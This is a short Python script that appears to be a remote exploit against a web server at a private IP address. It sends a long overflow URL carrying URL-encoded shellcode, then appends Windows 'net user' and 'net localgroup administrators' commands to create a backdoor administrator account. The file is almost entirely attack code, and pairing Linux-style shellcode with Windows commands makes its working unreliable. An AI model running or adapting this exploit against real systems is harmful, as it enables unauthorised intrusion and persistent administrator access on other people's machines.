#!/usr/bin/env python
import urllib

package = "http://10.1.1.230/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/%eb%1f%5e%89%76%08%31%c0%88%46%07%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%db%89%d8%40%cd%80%e8%dc%ff%ff%ff"


# net user os13532 os13532 /add
#net localgroup administrators os13532 /add

print('1')
cmd = package + 'net%20user%20os13532%20os13532%20%2Fadd'
urllib.urlopen(cmd)
print('2')
cmd = package + 'net%20localgroup%20administrators%20os13532%20%2Fadd'
urllib.urlopen(cmd)